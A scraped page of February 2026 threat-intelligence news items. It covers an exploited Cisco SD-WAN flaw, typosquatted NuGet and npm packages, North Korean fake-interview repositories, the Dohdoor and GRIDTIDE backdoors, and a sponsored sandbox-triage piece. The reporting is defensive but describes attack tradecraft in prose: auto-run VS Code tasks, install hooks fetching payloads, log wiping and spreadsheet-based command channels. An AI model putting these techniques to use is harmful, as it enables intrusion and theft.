Tag: Cyber Threats

Ravie LakshmananFeb 26, 2026Vulnerability / Network Security

A newly disclosed maximum-severity security flaw in Cisco Catalyst SD-WAN Controller (formerly vSmart) and Catalyst SD-WAN Manager (formerly vManage) has come under active exploitation in the wild as part of malicious activity that dates back to 2023.

The vulnerability, tracked as CVE-2026-20127 (CVSS score: 10.0), allows an unauthenticated remote attacker to bypass authentication and obtain administrative privileges on an affected system by sending a crafted request.

Successful exploitation of the flaw could allow the adversary to obtain elevated privileges and log in to the system as an internal, high-privileged, non-root user account.

“This vulnerability exists because the peering authentication mechanism in an affected system is not working properly,” Cisco said in an advisory, adding the threat actor could leverage the non-root user account to access NETCONF and manipulate network configuration for the SD-WAN fabric. 

The shortcoming affects the following deployment types, irrespective of the device configuration –

• On-Prem Deployment
• Cisco Hosted SD-WAN Cloud
• Cisco Hosted SD-WAN Cloud – Cisco Managed
• Cisco Hosted SD-WAN Cloud – FedRAMP Environment

Cisco credited the Australian Signals Directorate’s Australian Cyber Security Centre (ASD-ACSC) for reporting the vulnerability. The networking equipment major is tracking the exploitation and subsequent post-compromise activity under the moniker UAT-8616, describing the cluster as a “highly sophisticated cyber threat actor.”

The vulnerability has been addressed in the following versions of Cisco Catalyst SD-WAN –

• Prior to version 20.91 – Migrate to a fixed release.
• Version 20.9 – 20.9.8.2 (Estimated release February 27, 2026)
• Version 20.111 – 20.12.6.1
• Version 20.12.5 – 20.12.5.3
• Version 20.12.6 – 20.12.6.1
• Version 20.131 – 20.15.4.2
• Version 20.141 – 20.15.4.2
• Version 20.15 – 20.15.4.2
• Version 20.161 – 20.18.2.1
• Version 20.18 – 20.18.2.1

“Cisco Catalyst SD-WAN Controller systems that are exposed to the internet and that have ports exposed to the internet are at risk of exposure to compromise,” Cisco warned.

After successfully compromising a public-facing application, the attackers have been found to leverage the built-in update mechanism to stage a software version downgrade and escalate to the root user by exploiting CVE-2022-20775 (CVSS score: 7.8), a high-severity privilege escalation bug in the CLI of Cisco SD-WAN Software, and then restoring the software back to the version it was originally running.

Some of the subsequent steps initiated by the threat actor are as follows –

• Created local user accounts that mimicked other local user accounts.
• Added a Secure Shell Protocol (SSH) authorized key for root access and modified SD-WAN-related start-up scripts to customize the environment.
• Used Network Configuration Protocol on port 830 (NETCONF) and SSH to connect to/between Cisco SD-WAN appliances within the management plane.
• Took steps to clear evidence of the intrusion by purging logs under “/var/log,” command history, and network connection history.

“UAT-8616’s attempted exploitation indicates a continuing trend of the targeting of network edge devices by cyber threat actors looking to establish persistent footholds into high-value organizations, including Critical Infrastructure (CI) sectors,” Talos said.

The development has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to add both CVE-2022-20775 and CVE-2026-20127 to its Known Exploited Vulnerabilities (KEV) catalog, mandating Federal Civilian Executive Branch (FCEB) agencies to apply the fixes within the next 24 hours.

To check for version downgrade and unexpected reboot events, CISA recommends analyzing the following logs –

• /var/volatile/log/vdebug
• /var/log/tmplog/vdebug
• /var/volatile/log/sw_script_synccdb.log 

CISA has also issued a new emergency directive, 26-03: Mitigate Vulnerabilities in Cisco SD-WAN Systems, as part of which federal agencies are required to inventory SD-WAN devices, apply updates, and assess potential compromise.

To that end, agencies have been ordered to provide a catalog of all in-scope SD-WAN systems on their networks by February 26, 2026, 11:59 p.m. ET. Additionally, they are required to submit a detailed inventory of all in-scope products and actions taken by March 5, 2026, 11:59 p.m. ET. Lastly, the agencies will have to submit the list of all steps taken to harden their environments by March 26, 2026, 11:59 p.m. ET.

Ravie LakshmananFeb 26, 2026Malware / Software Security

Cybersecurity researchers have disclosed details of a new malicious package discovered on the NuGet Gallery, impersonating a library from financial services firm Stripe in an attempt to target the financial sector.

The package, codenamed StripeApi.Net, attempts to masquerade as Stripe.net, a legitimate library from Stripe that has over 75 million downloads. It was uploaded by a user named StripePayments on February 16, 2026. The package is no longer available.

“The NuGet page for the malicious package is set up to resemble the official Stripe.net package as closely as possible,” ReversingLabs Petar Kirhmajer said. “It uses the same icon as the legitimate package and contains a nearly identical readme, only swapping the ‘Stripe.net’ references to read ‘Stripe-net.’”

In a further effort to lend credibility to the typosquatted package, the threat actor behind the campaign is said to have artificially inflated the download count to more than 180,000. But in an interesting twist, the downloads were split across 506 versions, with each version recording about 300 downloads on average.

The package replicates some of the legitimate Stripe package’s functionality, but also modifies certain critical methods to collect and transfer sensitive data, including the user’s Stripe API token, back to the threat actor. With the rest of the codebases remaining fully functional, it’s unlikely to attract any suspicion from unsuspecting developers who may have inadvertently downloaded it.

ReversingLabs said it discovered and reported the package “relatively soon” after it was initially released, causing it to be taken before it could inflict any serious damage.

The software supply chain security company also noted that the activity marks a shift from prior campaigns that have leveraged bogus NuGet packages to target the cryptocurrency ecosystem and facilitate wallet key theft.

“Developers who mistakenly download and integrate a typosquatted library like StripeAPI.net will still have their applications compile successfully and function as intended,” Kirhmajer said. “Payments would process normally and, from the developer’s perspective, nothing would appear broken. In the background, however, sensitive data is being secretly copied and exfiltrated by malicious actors.”

A “coordinated developer-targeting campaign” is using malicious repositories disguised as legitimate Next.js projects and technical assessments to trick victims into executing them and establish persistent access to compromised machines.

“The activity aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” the Microsoft Defender Security Research Team said in a report published this week.

The tech giant said the campaign is characterized by the use of multiple entry points that lead to the same outcome, where attacker-controlled JavaScript is retrieved at runtime and executed to facilitate command-and-control (C2).

The attacks rely on the threat actors setting up fake repositories on trusted developer platforms like Bitbucket, using names like “Cryptan-Platform-MVP1” to trick developers looking for jobs into running as part of an assessment process.

Further analysis of the identified repositories has uncovered three distinct execution paths that, while triggered in different ways, have the end goal of executing an attacker‑controlled JavaScript directly in memory –

• Visual Studio Code workspace execution, where Microsoft Visual Studio Code (VS Code) projects with workspace automation configuration are used to run malicious code retrieved from a Vercel domain as soon as the developer opens and trusts the project. This involves the use of the runOn: “folderOpen” to configure the task.
• Build‑time execution during application development, where manually running the development server via “npm run dev” is enough to activate the execution of malicious code embedded within modified JavaScript libraries masquerading as jquery.min.js, causing it to fetch a JavaScript loader hosted on Vercel. The retrieved payload is then executed in memory by Node.js.
• Server startup execution via environment exfiltration and dynamic remote code execution, where launching the application backend causes malicious loader logic concealed within a backend module or route file to be executed. The loader transmits the process environment to the external server and executes JavaScript received as a response in memory within the Node.js server process.

Microsoft noted that all three methods lead to the same JavaScript payload that’s responsible for profiling the host and periodically polling a registration endpoint to get a unique “instanceId” identifier. This identifier is subsequently supplied in follow-on polls to correlate activity.

It’s also capable of executing server-provided JavaScript in memory, ultimately paving the way for a second-stage controller that turns the initial foothold into a persistent access pathway for receiving tasks by contacting a different C2 server and executing them in memory to minimize leaving traces on disk.

Attack chain overview

“The controller maintains stability and session continuity, posts error telemetry to a reporting endpoint, and includes retry logic for resilience,” Microsoft said. “It also tracks spawned processes and can stop managed activity and exit cleanly when instructed. Beyond on-demand code execution, Stage 2 supports operator-driven discovery and exfiltration.”

While the Windows maker did not attribute the activity to a specific threat actor, the use of VS Code tasks and Vercel domains to stage malware is a tactic that has been adopted by North Korea-linked hackers associated with a long-running campaign known as Contagious Interview.

The end goal of these efforts is to gain the ability to deliver malware to developer systems, which often contain sensitive data, such as source code, secrets, and credentials, that can provide opportunities to pivot deeper into the target network.

Using GitHub gists in VS Code tasks.json instead of Vercel URLs

In a report published Wednesday, Abstract Security said it has observed a shift in threat actor tactics, notably a spike in alternative staging servers used in the VS Code tasks commands instead of Vercel URLs. This includes the use of scripts hosted on GitHub gists (“gist.githubusercontent[.]com”) to download and run next-stage payloads. An alternative approach employs URL shorteners like short[.]gy to conceal Vercel URLs.

The cybersecurity company said it also identified a malicious npm package linked to the campaign named “eslint-validator” that retrieves and runs an obfuscated payload from a Google Drive URL. The payload in question is a known JavaScript malware referred to as BeaverTail.

Cybersecurity company Red Asgard, which has also been extensively tracking the campaign, said the threat actors have leveraged crafted VS code projects that use the runOn: “folderOpen” trigger to deploy malware that, in turn, queries the Polygon blockchain to retrieve JavaScript stored within an NFT contract for improved resilience. The final payload is an information stealer that harvests credentials and data from web browsers, cryptocurrency wallets, and password managers.

Distribution of staging infrastructure used by North Korean threat actors in 2025

“This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” Microsoft concluded.

To counter the threat, the company is recommending that organizations harden developer workflow trust boundaries, enforce strong authentication and conditional access, maintain strict credential hygiene, apply the principle of least privilege to developer accounts and build identities, and separate build infrastructure where feasible. 

The development comes as GitLab said it banned 131 unique accounts that were engaged in distributing malicious code projects linked to the Contagious Interview campaign and the fraudulent IT worker scheme known as Wagemole.

“Threat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however, they also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses,” GitLab’s Oliver Smith said. “Threat actors created accounts using Gmail email addresses in almost 90% of cases.”

In more than 80% of the cases, per the software development platform, the threat actors are said to have leveraged at least six legitimate services to host malware payloads, including JSON Keeper, Mocki, npoint.io, Render, Railway.app, and Vercel. Among these, Vercel was the most commonly used, with the threat actors relying on the web development platform no less than 49 times in 2025.

“In December, we observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or executing a custom script to decode malware from binary data in a fake font file,” Smith added, corroborating the aforementioned findings from Microsoft.

Assessed organization chart of the North Korean IT worker cell

Also discovered by GitLab was a private project “almost certainly” controlled by a North Korean national managing a North Korean IT worker cell that contained detailed financial and personnel records showing earnings of more than $1.64 million between Q1 2022 and Q3 2025. The project included more than 120 spreadsheets, presentations, and documents tracking quarterly income performance for individual team members.

“Records demonstrate that these operations function as structured enterprises with defined targets and operating procedures and close hierarchical oversight,” GitLab noted. “This cell’s demonstrated ability to cultivate facilitators globally provides a high degree of operational resiliency and money laundering flexibility.”

A GitHub account associated with a North Korean IT worker

In a report published earlier this month, Okta said the “vast majority” of interviews with IT workers do not progress to a second interview or job offer, but noted they are “learning from their mistakes” and that a large number of them seek temporary contract work as software developers hired out to third-party companies to take advantage of the fact that they are unlikely to enforce rigorous background checks.

“Some actors however seem to be more competent at crafting personas and passing screening interviews,” it added. A kind of IT Worker natural selection is at play. The most successful actors are very prolific, and scheduled hundreds of interviews each.”

Ravie LakshmananFeb 26, 2026Cybersecurity / Hacking News

Nothing here looks dramatic at first glance. That’s the point. Many of this week’s threats begin with something ordinary, like an ad, a meeting invite, or a software update.

Behind the scenes, the tactics are sharper. Access happens faster. Control is established sooner. Cleanup becomes harder.

Here is a quick look at the signals worth paying attention to.

These stories may seem separate, but they point in the same direction. Speed is increasing. Deception is improving. And attackers are finding new ways to blend into everyday activity.

The warning signs are there for those who look closely. Small gaps, delayed patches, misplaced trust, and rushed clicks still make the biggest difference.

Staying aware of these shifts is no longer optional. The details change each week. The pressure does not.

Ravie LakshmananFeb 26, 2026Malware / Threat Intelligence

A previously undocumented threat activity cluster has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025.

The campaign is being tracked by Cisco Talos under the moniker UAT-10027. The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor.

“Dohdoor utilizes the DNS-over-HTTPS (DoH) technique for command-and-control (C2) communications and has the ability to download and execute other payload binaries reflectively,” security researchers Alex Karkins and Chetan Raghuprasad said in a technical report shared with The Hacker News.

Although the initial access vector used in the campaign is currently not known, it’s suspected to involve the use of social engineering phishing techniques, leading to the execution of a PowerShell script.

The script then proceeds to download and run a Windows batch script from a remote staging server, which, for its part, facilitates the download of a malicious Windows dynamic-link library (DLL) that’s named “propsys.dll” or “batmeter.dll.”

The DLL payload – i.e., Dohdoor – is launched by means of a legitimate Windows executable (e.g., “Fondue.exe,” “mblctr.exe,” and “ScreenClippingHost.exe”) using a technique referred to as DLL side-loading. The backdoored access created by the implant is used to retrieve a next-stage payload directly into the victim’s memory and execute it. The payload is assessed to be a Cobalt Strike Beacon.

“The threat actor hides the C2 servers behind the Cloudflare infrastructure, ensuring that all outbound communication from the victim machine appears as legitimate HTTPS traffic to a trusted global IP address,” Talos said. 

“This technique bypasses DNS-based detection systems, DNS sinkholes, and network traffic analysis tools that monitor suspicious domain lookups, ensuring that the malware’s C2 communications remain stealth by traditional network security infrastructure.”

Dohdoor has also been found to unhook system calls to bypass endpoint detection and response (EDR) solutions that monitor Windows API calls through user-mode hooks in NTDLL.dll.

There is currently no clarity on who is behind UAT-10027, but Cisco Talos said it found some tactical similarities between Dohdoor and Lazarloader, a downloader previously identified as used by the North Korean hacking group Lazarus in attacks aimed at South Korea.

“While UAT-10027’s malware shares technical overlaps with the Lazarus Group, the campaign’s focus on the education and health care sectors deviates from Lazarus’ typical profile of cryptocurrency and defense targeting,” Talos concluded.

“However, […] North Korean APT actors have targeted the healthcare sector using Maui ransomware, and another North Korean APT group, Kimsuky, has targeted the education sector, highlighting the overlaps in the victimology of UAT-10027 with that of other North Korean APTs.”

Ravie LakshmananFeb 25, 2026Cyber Espionage / Network Security

Google on Wednesday disclosed that it worked with industry partners to disrupt the infrastructure of a suspected China-nexus cyber espionage group tracked as UNC2814 that breached at least 53 organizations across 42 countries.

“This prolific, elusive actor has a long history of targeting international governments and global telecommunications organizations across Africa, Asia, and the Americas,” Google Threat Intelligence Group (GTIG) and Mandiant said in a report published today.

UNC2814 is also suspected to be linked to additional infections in more than 20 other nations. The tech giant, which has been tracking the threat actor since 2017, has been observed using API calls to communicate with software-as-a-service (SaaS) apps as command-and-control (C2) infrastructure. The idea, it added, is to disguise their malicious traffic as benign.

Central to the hacking group’s operations is a novel backdoor dubbed GRIDTIDE that abuses Google Sheets API as a communication channel to disguise C2 traffic and facilitate the transfer of raw data and shell commands. It’s a C-based malware that supports file upload/download and the execution of arbitrary shell commands.

Exactly how UNC2814 obtains initial access remains a topic of investigation, but the group is said to have a history of exploiting and compromising web servers and edge systems.

Attacks mounted by the threat actor have leveraged a service account to move laterally within the environment via SSH. Also put to use are living-off-the-land (LotL) binaries to conduct reconnaissance, escalate privileges, and set up persistence for the backdoor.

“To achieve persistence, the threat actor created a service for the malware at /etc/systemd/system/xapt.service, and once enabled, a new instance of the malware was spawned from /usr/sbin/xapt,” Google explained.

Another noteworthy aspect is the deployment of SoftEther VPN Bridge to establish an outbound encrypted connection to an external IP address. It’s worth mentioning here that the abuse of SoftEther VPN has been linked to multiple Chinese hacking groups.

There is evidence indicating that GRIDTIDE is dropped on endpoints containing personally identifiable information (PII), an aspect that’s consistent with cyber espionage activity focused on monitoring persons of interest. Google, however, noted that it did not observe any data exfiltration taking place during the course of the campaign.

GRIDTIDE execution lifecycle

GRIDTIDE’s C2 mechanism involves a cell-based polling mechanism, where specific roles are assigned to certain spreadsheet cells to enable bidirectional communication –

• A1, to poll for attacker commands and overwrite it with a status response (e.g., S-C-R or Server-Command-Success)
• A2-An, to transfer data, such as command output and files
• V1, to store system data from the victim endpoint

As part of the action, Google said it terminated all Google Cloud Projects controlled by the attacker, disabled all known UNC2814 infrastructure, and cut off access to attacker-controlled accounts and Google Sheets API calls leveraged by the actor for command-and-control (C2) purposes.

The tech giant described UNC2814 as one of the “most far-reaching, impactful campaigns” encountered in recent years, adding that it has issued formal victim notifications to each of the targets and that it is actively supporting organizations with verified compromises resulting from this threat.

The latest discovery is one of many concurrent efforts by Chinese nation-state groups to embed themselves into networks for long-term access. The development also highlights that the network edge continues to take the brunt of internet-wide exploitation attempts, with threat actors frequently exploiting vulnerabilities and misconfigurations in such appliances as a common entry point into enterprise networks.

These appliances have become attractive targets in recent years as they typically lack endpoint malware detection, yet provide direct network access or pivot points to internal services if compromised.

“The global scope of UNC2814’s activity, evidenced by confirmed or suspected operations in over 70 countries, underscores the serious threat facing telecommunications and government sectors, and the capacity for these intrusions to evade detection by defenders, Google said.

“Prolific intrusions of this scale are generally the result of years of focused effort and will not be easily re-established. We expect that UNC2814 will work hard to re-establish its global footprint.”

Attackers are targeting developers with malicious Next.js repositories to perform remote code execution (RCE) and establish a persistent command-and-control (C2) channel on infected machines in a campaign tied to North Korea’s fake job-recruitment scams.

Microsoft sounded the alarm on the activity, which delivers malicious repositories disguised as legitimate Next.js projects and technical assessment materials. Researchers from Microsoft Defender Experts and the Microsoft Defender Security Research Team discovered various Trojanized repositories that offered different execution paths for delivery of a backdoor to compromise developer systems.

“The campaign uses multiple entry points that converge on the same outcome: runtime retrieval and local execution of attacker-controlled JavaScript that transitions into staged command-and-control,” according to a blog post published Tuesday by the two Microsoft security teams. 

Related:Lazarus Group Picks a New Poison: Medusa Ransomware

Without specifically attributing the campaign to North Korea, the researchers noted that the activity “aligns with a broader cluster of threats that use job-themed lures to blend into routine developer workflows and increase the likelihood of code execution,” a cluster associated with North Korea’s Lazarus APT. The blog post also includes links to third-party research earlier this year about North Korean APT activity tied to Microsoft Visual Studio Code. Indeed, North Korean actors for years have been persistently targeting developers by dangling job opportunities that, as part of a fake job interview, ask them to participate in sample development challenges that deliver malicious code to their machines.

“This developer‑targeting campaign shows how a recruiting‑themed ‘interview project’ can quickly become a reliable path to remote code execution by blending into routine developer workflows such as opening a repository, running a development server, or starting a backend,” the blog post stated.

The ultimate objective of the campaign is to gain execution on developer systems that often contain high‑value assets such as source code, environment secrets, and access to build or cloud resources, according to Microsoft. The campaign once again demonstrates how developer workflows are a primary attack surface for cyber espionage and other activity that can lead to further compromise of the entire software supply chain, according to the researchers.

Repositories Leading to Backdoor Activity

The researchers discovered the campaign recently when Microsoft Defender flagged suspicious outbound connections from Node.js processes to attacker-controlled infrastructure, eventually tracking the activity to Next.js repositories all exhibiting the same malicious behavior. Next.js is a widely used open source Web development framework maintained by cloud software vendor Vercel.

Related:Singapore & Its 4 Major Telcos Fend Off Chinese Hackers

The malicious repositories initiate one of two execution paths that deliver a lightweight registration stage to establish host identity as well as bootstrap code. These eventually lead to runtime retrieval and in-memory invocation of attacker-controlled JavaScript that turns into a persistent C2 connection for delivering further payloads and exfiltrating data from infected systems.

Some repositories abuse Visual Studio Code workspace automation by including a .vscode/tasks.json configured to execute tasks automatically when a workspace is opened and trusted, triggering a fetch-and-execute loader sequence via Node.js. Others embed obfuscated malicious logic directly into development assets so that when a developer runs standard build commands or starts a development server, the disguised code decodes and fetches additional payloads.

Developer Attacks Rage On

North Korean cyberspies have been targeting developers with fake job opportunities since at least 2021 when security researchers uncovered the Dream Jobs campaign, sending fake job offers that linked to malicious Web files. This campaign eveolved into more sophisticated socially engineered attacks in which developers were lured into participating in fake development projects or recruitment challenges that delivered spyware and other malware. 

Related:Operation DoppelBrand: Weaponizing Fortune 500 Brands

The latest discovery of weaponized Next.js repositories illustrates threat actors’ commitment to target developers not only to establish a spy channel but also to poison the software supply chain as a whole. To defend against this, secrity operations teams and DevSecOps leaders “should treat developer workflows as a privileged attack surface, integrating IDE trust policies, behavioral analytics, and continuous monitoring into broader threat detection and response programs,” according to Microsoft.

Organizations can do this by enforcing strict trust policies for IDEs like Visual Studio Code; deploying attack surface reduction rules via Microsoft Defender for Endpoint to constrain risky script execution behaviors; and prioritizing visibility into unexpected Node.js execution patterns and anomalous outbound connections from developer endpoints.

Ravie LakshmananFeb 25, 2026Cybersecurity / Malware

Cybersecurity researchers have discovered four malicious NuGet packages that are designed to target ASP.NET web application developers to steal sensitive data.

The campaign, discovered by Socket, exfiltrates ASP.NET Identity data, including user accounts, role assignments, and permission mappings, as well as manipulates authorization rules to create persistent backdoors in victim applications.

The names of the packages are listed below –

• NCryptYo
• DOMOAuth2_
• IRAOAuth2.0
• SimpleWriter_

The NuGet packages were published to the repository between August 12 and 21, 2024, by a user named hamzazaheer. They have since been taken down from the repository following responsible disclosure, but not before attracting more than 4,500 downloads.

According to the software supply chain security company, NCryptYo acts as a first-stage dropper that establishes a local proxy on localhost:7152 that relays traffic to an attacker-controlled command-and-control (C2) server whose address is dynamically retrieved at runtime. It’s worth noting that NCryptYo attempts to masquerade as the legitimate NCrypto package.

It’s not exactly clear how users are tricked into downloading these packages, as the attack chain kicks in only after all four of them are installed.

“The campaign’s objective is not to compromise the developer’s machine directly, but to compromise the applications they build,” Pandya explained. “By controlling the authorization layer during development, the threat actor gains access to deployed production applications.”

“When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules. The threat actor or a buyer can then grant themselves admin-level access to any deployed instance.”

The disclosure comes as Tenable disclosed details of a malicious npm package named ambar-src that amassed more than 50,000 downloads before it was removed from the JavaScript registry. It was uploaded to npm on February 13, 2026.

The package makes use of npm’s preinstall script hook to trigger the execution of malicious code contained within index.js during its installation. The malware is designed to run a one-liner command that obtains different payloads from the domain “x-ya[.]ru” based on the operating system –

• On Windows, it downloads and executes a file called msinit.exe containing encrypted shellcode, which is decoded and loaded into memory.
• On Linux, it fetches a bash script and executes it. The bash script then retrieves another payload from the same server, an ELF binary that works as an SSH-based reverse shell client.
• On macOS, it fetches another script that uses osascript to run JavaScript responsible for dropping Apfell, a JavaScript for Automation (JXA) agent part of the Mythic C2 framework that can conduct reconnaissance, collect screenshots, steal data from Google Chrome, and capture system passwords by displaying a fake prompt.

“It employs multiple techniques to evade detection, and drops open-source malware with advanced capabilities, targeting developers on Windows, Linux, and macOS hosts,” the company said.

Once the data is collected, it’s exfiltrated to the attacker to a Yandex Cloud domain in an effort to blend in with legitimate traffic and take advantage of the fact that trusted services are less likely to be blocked within corporate networks.

Ambar-src is assessed to be a more mature variant of eslint-verify-plugin, another rogue npm package that was recently flagged by JFrog as dropping Mythic agents Poseidon and Apfell on Linux and macOS systems.

“If this package is installed or running on a computer, that system must be considered fully compromised,” Tenable said. “While the package should be removed, please be aware that because an external entity may have gained full control of the computer, removing the package does not guarantee the elimination of all resulting malicious software.”

Triage is supposed to make things simpler. In a lot of teams, it does the opposite.

When you can’t reach a confident verdict early, alerts turn into repeat checks, back-and-forth, and “just escalate it” calls. That cost doesn’t stay inside the SOC; it shows up as missed SLAs, higher cost per case, and more room for real threats to slip through.

So where does triage go wrong? Here are five triage issues that turn investigations into expensive guesswork, and how top teams are changing the outcome with execution evidence.

1. Decisions Made Without Real Evidence

Business risk: The hardest triage failure to notice is when decisions get made before proof exists. If responders rely on partial signals (labels, hash matches, reputation), they end up approving or escalating cases without seeing what the file or link actually does. 

That uncertainty fuels false positives, missed real threats, slower containment, and higher cost per case, while giving attackers more time before anyone has confidence in the verdict.

The Fix: Get Execution Evidence Early

High-performing teams reduce this risk by validating behavior at triage, not later. Sandboxes make that practical by showing real execution: process activity, network calls, persistence, and the full attack chain. 

For example, with ANY.RUN’s interactive sandbox, teams report that in ~90% of cases, they can see the full attack chain within ~60 seconds, turning unclear alerts into evidence-backed decisions early in the workflow.

See the complex hybrid attack exposed in 35 seconds.

Full attack chain with fake Microsoft login page revealed inside ANY.RUN sandbox in less than a minute

In this real-world hybrid phishing scenario combining Tycoon 2FA and Salty 2FA, most traditional controls failed to detect the threat because the attack blended multiple kits and evasive redirects. Inside an interactive sandbox, however, the full malicious flow and a clear verdict appeared in just 35 seconds.

Business outcomes:

• Faster, evidence-backed verdicts at triage
• Lower cost per case by reducing rework
• Fewer missed threats caused by “unclear” closures

2. Triage Quality Depends on Analyst Seniority

Business risk: In many SOCs, the outcome of triage depends on who touches the alert. Senior staff close faster because they recognize patterns; junior staff escalates because they don’t have enough confidence or context. The result is inconsistent verdicts, uneven response speed, and a workflow that doesn’t scale cleanly as alert volume grows.

The Fix: Make Triage Repeatable for Every Shift

Top teams reduce this gap by designing triage around shared evidence and repeatable steps, not personal experience. The goal is simple: give Tier 1 enough clarity to reach the same conclusion a senior responder would, using the same observable facts.

Auto-generated report for easy sharing between team members

With ANY.RUN, teams can share the same sandbox session and findings through built-in teamwork features, so knowledge doesn’t stay in one person’s head. That consistency helps reduce “escalate to be safe” behavior and keeps triage outcomes stable across shifts.

Business outcomes:

• Consistent triage across shifts
• Fewer senior reviews
• More predictable SLAs

3. Triage Delays Give Attackers More Time

Business risk: Even when a threat is detected, triage can take too long to confirm what’s happening. Manual checks and queued escalations delay action, extending dwell time and giving attackers room to move laterally or exfiltrate data. The business impact shows up as missed SLAs and higher incident costs.

The Fix: Shrink Time-to-Decision at Triage

High-performing teams treat triage as a speed problem: reduce the steps between detection and a defensible verdict. That means confirming behavior immediately, before the case bounces between queues or turns into a long validation loop.

Full visibility into the attack revealed in 35 seconds inside ANY.RUN’s cloud sandbox

With the interactive sandbox, suspicious files and URLs can be detonated quickly, and the full attack chain often becomes visible in under a minute. Operational results often show up to 21 minutes shaved off MTTR per case, because teams spend less time waiting, re-checking, and escalating just to confirm what’s happening.

Business outcomes:

• Earlier confirmation, shorter dwell time
• Fewer SLA misses under load
• Smaller incident impact

4. Over-Escalation Hides Real Priority Incidents

Business risk: When evidence is unclear, Tier 1 escalates “just to be safe,” and Tier 2 becomes a verification layer for borderline cases. That clogs queues, pulls senior time into “maybes,” and slows response to high-impact incidents, increasing cost per investigation and raising the risk that critical cases wait too long.

The Fix: Close More Cases at Tier 1 with Execution Evidence

When Tier 1 can prove or dismiss alerts independently, Tier 2 stays focused on real incidents instead of acting as a verification desk.

With solutions like ANY.RUN, that becomes realistic because the sandbox is built for fast triage: it’s intuitive to use, provides AI-assisted guidance during analysis, and generates auto-built reports that capture the key evidence without extra manual write-ups. A dedicated IOCs tab also pulls indicators into one place, so Tier 1 can escalate with context rather than escalating for confirmation. 

AI assisted guidance showcased in ANY.RUN’s sandbox

This is how teams see up to a 30% reduction in Tier-1 → Tier-2 escalations, preserving senior capacity for high-risk threats.

Business outcomes:

• Less Tier 2 overload
• Faster queues
• Lower escalation volume

5. Manual Work Limits Scale and Increases Error

Business risk: A lot of triage is still repetitive manual work, following redirect chains, dealing with CAPTCHAs, or uncovering hidden links in QR codes. As volume grows, this limits throughput, increases mistakes, and triggers unnecessary escalation simply because teams run out of time.

The Fix: Reduce Manual Steps with Interactive Automation

Modern sandbox environments combine automation with human-like interactivity, allowing suspicious content to be safely opened, redirected flows followed, and protection mechanisms such as CAPTCHAs or QR-embedded links to be handled automatically during analysis.

Malicious PDF with a QR code: ANY.RUN extracts and opens the embedded link automatically, revealing the next stage of the attack

With ANY.RUN’s interactive sandbox, these routine triage actions are performed inside the controlled environment, exposing hidden malicious behavior while removing repetitive work from responders. In day-to-day operations, teams often see up to a 20% decrease in Tier 1 workload, along with fewer escalations and more time available for high-value investigation. 

Business outcomes:

• More Tier 1 capacity
• Fewer manual errors
• More time for confirmed threats

Reduce Business Risk by Fixing Triage First

Broken triage rarely looks dramatic. Instead, it quietly slows response, increases escalation pressure, and keeps real threats open longer than the business can afford.

Teams that shift to evidence-driven, execution-based triage consistently report measurable gains, including:

• Up to 3× improvement in overall SOC efficiency
• 94% of users reported faster triage and clearer verdicts
• Up to 58% more threats identified across investigations

Improving speed, certainty, and scalability at the triage stage is one of the fastest ways to reduce MTTR, control operational cost, and cut real business exposure.

Explore evidence-driven triage for your SOC and turn faster decisions into measurable security performance.